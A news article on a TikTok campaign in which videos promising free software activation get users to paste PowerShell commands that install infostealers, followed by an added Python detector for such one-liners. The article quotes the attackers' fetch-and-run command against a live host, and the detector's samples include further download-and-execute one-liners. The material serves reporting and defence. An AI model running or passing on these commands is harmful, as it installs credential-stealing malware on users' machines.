Posted On October 19, 2025

TikTok Videos Spread Infostealer Malware Through “ClickFix” PowerShell Tricks

James Harris

Cybersecurity publishers like Bleeping Computer are raising alarms as a growing campaign uses short-form videos on TikTok to deliver information-stealer malware under the guise of free software activations. Under this scheme, threat actors publish clips promising “free Windows or Spotify unlocks” and instruct users to run simple PowerShell commands, a tactic known as a “ClickFix” attack.

Once executed, the script downloads payloads such as Vidar or StealC, which harvest credentials, cookies and crypto wallet data and send them back to attackers. The videos often appear benign, but deliver malicious code by showing users how to paste a command like iex (irm slmgr[.]win/activate) into PowerShell.

Experts note the use of AI-generated content and rapid creation of fake profiles to push these scams at scale through TikTok’s algorithmic reach. One video reached nearly half a million views.

Organizations and individual users alike are urged to treat any unsolicited “software activation” or “premium unlock” video with caution. Running unknown commands, particularly those invoked via PowerShell or terminal windows, remains a high-risk behaviour.

Cyber-defence teams recommend enforcing “no direct execution of social-media provided commands,” and increasing detection of hidden persistence mechanisms created by such payloads.
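One way to hunt for the paste-and-run one-liner described above in collected process command lines or PowerShell script-block logs, shown as an added example that is not code from this article or from Bleeping Computer. The function names and the example.invalid samples are constructed for illustration; only the first sample is the command quoted in the article.

```python
import re

# Verbs that run a string as code, and verbs that fetch remote content.
EXEC = r"(?:iex|invoke-expression)"
FETCH = r"(?:irm|invoke-restmethod|iwr|invoke-webrequest|curl|wget|downloadstring)"
# Fetched content handed straight to execution: nested "iex (irm ...)" or piped "irm ... | iex".
NESTED = re.compile(rf"\b{EXEC}\b\s*\(?[^|;]*\b{FETCH}\b")
PIPED = re.compile(rf"\b{FETCH}\b[^;]*\|\s*{EXEC}\b")
# Host in the first argument after a fetch verb (optional -Parameter names, quote, scheme).
HOST = re.compile(
    rf"\b{FETCH}\b[\s(]+(?:-\w+\s+)*[\"']?(?:https?://)?([a-z0-9.-]+\.[a-z]{{2,}})"
)


def normalize(cmd: str) -> str:
    """Lowercase, refang '[.]', drop backtick escapes, collapse whitespace."""
    cmd = cmd.lower().replace("[.]", ".").replace("`", "")
    return re.sub(r"\s+", " ", cmd).strip()


def check_command(cmd: str) -> dict:
    """Flag fetch-and-execute one-liners; report contacted hosts in defanged form."""
    norm = normalize(cmd)
    hit = bool(NESTED.search(norm) or PIPED.search(norm))
    hosts = sorted({h.replace(".", "[.]") for h in HOST.findall(norm)}) if hit else []
    return {"suspicious": hit, "hosts": hosts}


# Sample 1 is the command quoted in the article; the others are constructed.
SAMPLES = [
    "iex (irm slmgr[.]win/activate)",
    'powershell -nop -w hidden -c "IRM https://files.example.invalid/fix.ps1 | I`EX"',
    "IEX (New-Object Net.WebClient).DownloadString('http://a.example.invalid/x')",
    "irm https://api.example.invalid/status | ConvertTo-Json",  # benign: no execution
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(check_command(sample), "<-", sample)
```

A hit means remote content is executed in memory without touching disk, so it warrants triage of the host and the parent process rather than automatic blocking; legitimate installers use the same pattern.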

Though social engineering itself is nothing new, the merging of platform-native video content, AI generation, and “paste-and-run” scripts signals a shift in how malware is being delivered. As this threat evolves, defenders should assume that any content promising “quick fix” solutions is hostile until proven otherwise.
